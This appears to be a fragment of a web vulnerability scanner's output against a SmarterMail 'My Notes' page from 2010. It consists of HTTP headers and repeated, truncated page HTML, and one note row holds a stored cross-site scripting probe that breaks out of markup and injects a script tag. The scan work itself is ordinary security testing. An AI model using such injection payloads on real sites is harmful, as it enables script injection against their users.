<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">
<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden"> </th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_OWQ2MGNiZjQyOTFiNGY3OWE4OTBlNTc1YzJhZWZhN2U-" name="ctl00_MPH_HyperGrid1_CB64_OWQ2MGNiZjQyOTFiNGY3OWE4OTBlNTc1YzJhZWZhN2U-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MGFhYWY2Yjg0YmM0NDJmYzk2NjE3NzQ1ZTQyZDc1ZDE-" name="ctl00_MPH_HyperGrid1_CB64_MGFhYWY2Yjg0YmM0NDJmYzk2NjE3NzQ1ZTQyZDc1ZDE-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YWM2MDExYzZhODA5NGUxZTkyOTQ3ZDA1OTk5YTA2Y2E-" name="ctl00_MPH_HyperGrid1_CB64_YWM2MDExYzZhODA5NGUxZTkyOTQ3ZDA1OTk5YTA2Y2E-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">'"--><script>netsparker(0x009625)</script></td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MWRjMzVlNjMyZGM0NGFlN2E2NWJhMzAwNGUyMzg1YzU-" name="ctl00_MPH_HyperGrid1_CB64_MWRjMzVlNjMyZGM0NGFlN2E2NWJhMzAwNGUyMzg1YzU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZjRhYmEzZWU3NDlhNDk4Yzk4ZGRlM2MyMGFlZTNjMjQ-" name="ctl00_MPH_HyperGrid1_CB64_ZjRhYmEzZWU3NDlhNDk4Yzk4ZGRlM2MyMGFlZTNjMjQ-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YmYwMzMzMmIzNjU2NGE1YmE0MTMzNjVhYWM4NWM5MmU-" name="ctl00_MPH_HyperGrid1_CB64_YmYwMzMzMmIzNjU2NGE1YmE0MTMzNjVhYWM4NWM5MmU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_M2EzYzllZmVhOGNiNDNhNGE4MWU0ZTM1NzZhMjk2Zjk-" name="ctl00_MPH_HyperGrid1_CB64_M2EzYzllZmVhOGNiNDNhNGE4MWU0ZTM1NzZhMjk2Zjk-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NTM3ZTU2MWQ0ODBiNGY5MDllYzk3ZTFjOTgwNDE5NDM-" name="ctl00_MPH_HyperGrid1_CB64_NTM3ZTU2MWQ0ODBiNGY5MDllYzk3ZTFjOTgwNDE5NDM-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></..
Identification Response
HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:20:38 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10769
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkBMRUDAAEgATEUKwMDZ2dnZGQCBg8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8JaBYCAgEPFgIeBFRleHRlZAIIDxYCHwloZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwoFDDEwNjMgbm90ZShzKWRkGAIFF2N0bDAwJE5hdlBIJEh5cGVyUGFnZXIxDwUgY3RsMDBfTVBIX0h5cGVyR3JpZDF8MjJ8MHw5fDUwfDBkBRRjdGwwMCRNUEgkSHlwZXJHcmlkMQ8FMVRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXxyZWFsZGF0ZSBkZXNjfEZhbHNlfEZhbHNlfDBkqwz7/J3W5eZFTmu+OETPYAkIws0=" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_DeleteIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_DeleteIcon(); return false;"><span class="BBInner">Delete</span></a></div>
<div id="ctl00_BPH_btnShowHideSearchBar" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ToggleSearch();; return false;"><span class="BBInner">Search</span></a></div>
</div>
<div class="ButtonBarRight">
</div>
<div class="ButtonBarClear">
<div class="ie6fix">
</div>
</div>
</div>
<div id="ctl00_SearchRow" class="SearchRow" style="display:none;">
<table class="SearchContents">
<tr>
<td class="SCText">
Search
<input name="ctl00$SPH$txtSearchString" type="text" id="ctl00_SPH_txtSearchString" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});" />
<select name="ctl00$SPH$lstColors" id="ctl00_SPH_lstColors" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option value="">All Colors</option>
<option value="white">White</option>
<option value="yellow">Yellow</option>
<option value="pink">Pink</option>
<option value="green">Green</option>
<option value="blue">Blue</option>
</select>
<select name="ctl00$SPH$lstCategories" id="ctl00_SPH_lstCategories" OnKeyPress="return EnterHandler(event, function(){__doPostBack('ctl00$SPH$btnGo','')});">
<option selected="selected" value="">All Categories</option>
<option value=" ">No Category</option>
<option value="1">1</option>
</select>
</td>
<td class="SCButtons">
<div id="ctl00_SPH_btnGo" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$SPH$btnGo',''); return false;"><span class="BBInner">Find Now</span></a></div>
<script type="text/javascript">
window.setInterval("if (invalid) { invalid = false; Refresh(); }", 333);
function Refresh() { __doPostBack('ctl00$SPH$btnGo',''); }
function ClearText()
{
var el = document.getElementById('ctl00_SPH_txtSearchString');
if (el) el.value = "";
el = document.getElementById('ctl00_SPH_lstCategories');
if (el) el.selectedIndex = 0;
el = document.getElementById('ctl00_SPH_lstColors');
if (el) el.selectedIndex = 0;
}
function DoubleClick(newUrl, uid, isNew)
{
OpenUniqueNewMessage(newUrl, 600, 500, uid);
}
</script>
<div id="ctl00_SPH_btnClear" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false;"><span class="BBInner">Clear</span></a></div><script type='text/javascript'>ToggleSearchClear = function() { ClearText(); __doPostBack('ctl00$SPH$btnClear',''); return false; }</script>
</td>
</tr>
</table>
</div>
<span id="ctl00_UpdatePanel1">
</span>
<div id="Scrollable" class="ContentDiv">
<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UP1">
<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="SmallImage" style="overflow: hidden"> </th><th scope="col" class="leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=text')">Note</a></th><th scope="col" class="rc leftpad" style="overflow: hidden"><a class='SortableHeader' href="javascript:__doPostBack('ctl00$MPH$HyperGrid1','sort=realdate')">Date<img src='/App_Themes/Default/Images/Misc/down.gif' /></a></th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NTQ3ZjE3ZGZhMjkxNDY2NTgwNWQyOTExZjA1NTE0ZTI-" name="ctl00_MPH_HyperGrid1_CB64_NTQ3ZjE3ZGZhMjkxNDY2NTgwNWQyOTExZjA1NTE0ZTI-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YmQwN2YyMjJkNDgyNDRmZmFhNmQ3MzEzMGNmMjM1NWU-" name="ctl00_MPH_HyperGrid1_CB64_YmQwN2YyMjJkNDgyNDRmZmFhNmQ3MzEzMGNmMjM1NWU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTExNWM5OWZhMmE5NDhjYWI5MTY3Zjk3YmRlNTcxNjc-" name="ctl00_MPH_HyperGrid1_CB64_MTExNWM5OWZhMmE5NDhjYWI5MTY3Zjk3YmRlNTcxNjc-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_ZGQxOGIwNWJjMjgzNDgyOWFlZjI4ZmJjMjA4ZGEwYzQ-" name="ctl00_MPH_HyperGrid1_CB64_ZGQxOGIwNWJjMjgzNDgyOWFlZjI4ZmJjMjA4ZGEwYzQ-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_NTdkNjE3OGU3NjkzNDViYWI2ZDk1OTMxMGNhMTJmZTA-" name="ctl00_MPH_HyperGrid1_CB64_NTdkNjE3OGU3NjkzNDViYWI2ZDk1OTMxMGNhMTJmZTA-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YzU3ZjA0NzMxZDUxNGQzZjg2YTE4YjBjZDEzZGYxMDU-" name="ctl00_MPH_HyperGrid1_CB64_YzU3ZjA0NzMxZDUxNGQzZjg2YTE4YjBjZDEzZGYxMDU-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YTMwZmNjNWZmOGNkNDZhN2JhMmJkZDI1MmU0MTlmNTI-" name="ctl00_MPH_HyperGrid1_CB64_YTMwZmNjNWZmOGNkNDZhN2JhMmJkZDI1MmU0MTlmNTI-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad">1</td><td class="rc leftpad">10/3/2010</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_YjlmMWRhZmVlODQ3NDQzYmFjNWQzMmY3NjI1NTc0ZTI-" name="ctl00_MPH_HyperGrid1_CB64_YjlmMWRhZmVlODQ3NDQzYmFjNWQzMmY3NjI1NTc0ZTI-" /></td><td class="SmallImage"><table class="NoteColor" cellSpacing="0" cellPadding="0" bgcolor="white" style="border:solid 1px gray" bordercolor="Black"><tr><td style="background-color: white;"> </td></tr></table></td><td class="leftpad&quo..
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:20:38 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10769
Connection: Close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Notes - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmNotes.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTExNDA1MDIwMjQPFggeCF9fX1RpdGxlBQhNeSBOb3Rlcx4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHgRfc0dGZxYCZg9kFgICAQ9kFgwCAw9kFgICAQ9kFgQCAQ8PFgQeC05hdmlnYXRlVVJMZR4XQ2xpZW50U2lkZVNjcmlwdE9uQ2xpY2sFOk9wZW5OZXdNZXNzYWdlKCdmcm1Ob3RlLmFzcHg/cmV0PTEmcG9wdXA9dHJ1ZScsIDYwMCwgNTAwKTtkZAIDDw8WAh4OTmF2aWdhdGVUYXJnZXQFC2RvdWJsZWNsaWNrZGQCBA8WAh4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsWAgIBD2QWBgIBDw9kFgIeCk9uS2V5UHJlc3MFS3JldHVybiBFbnRlckhhbmRsZXIoZXZlbnQsIGZ1bmN0aW9uKCl7X19kb1Bvc3RCYWNrKCdjdGwwMCRTUEgkYnRuR28nLCcnKX0pO2QCAg8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQYKQWxsIENvbG9ycwVXaGl0ZQZZZWxsb3cEUGluawVHcmVlbgRCbHVlFQYABXdoaXRlBnllbGxvdwRwaW5rBWdyZWVuBGJsdWUUKwMGZ2dnZ2dnZGQCAw8QD2QWAh8IBUtyZXR1cm4gRW50ZXJIYW5kbGVyKGV2ZW50LCBmdW5jdGlvbigpe19fZG9Qb3N0QmFjaygnY3RsMDAkU1BIJGJ0bkdvJywnJyl9KTsQFQMOQWxsIENhdGVnb3JpZXMLTm8gQ2F0ZWdvcnkBMRUDAAEgATEUKwMDZ2dnZGQCBg8WAh4HVmlzaWJsZWhkAgcPZBYCZg9kFgICAQ8WAh8JaBYCAgEPFgIeBFRleHRlZAIIDxYCHwloZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwoFDDEwNjMgbm90ZShzKWRkGAIFF2N0bDAwJE5hdlBIJEh5cGVyUGFnZXIxDwUgY3RsMDBfTVBIX0h5cGVyR3JpZDF8MjJ8MHw5fDUwfDBkBRRjdGwwMCRNUEgkSHlwZXJHcmlkMQ8FMVRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXxyZWFsZGF0ZSBkZXNjfEZhbHNlfEZhbHNlfDBkqwz7/J3W5eZFTmu+OETPYAkIws0=" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
self.EnableAnimations = false;
</script>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UP1','tctl00$NavPH$UpdatePanel2','tctl00$CntPH$UpdatePanel3'], ['ctl00$BPH$DeleteIcon','ctl00$SPH$btnGo','ctl00$SPH$btnClear'], [], 90);
//]]>
</script>
<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
My Notes
</div>
</div>
</div>
<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">
<div id="ctl00_BPH_btnAddNote" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('frmNote.aspx?ret=1&popup=true', 600, 500);; return false;"><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_EditIcon" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_EditIcon(); return false;"><span class="BBInner">Edit</span></a></div>
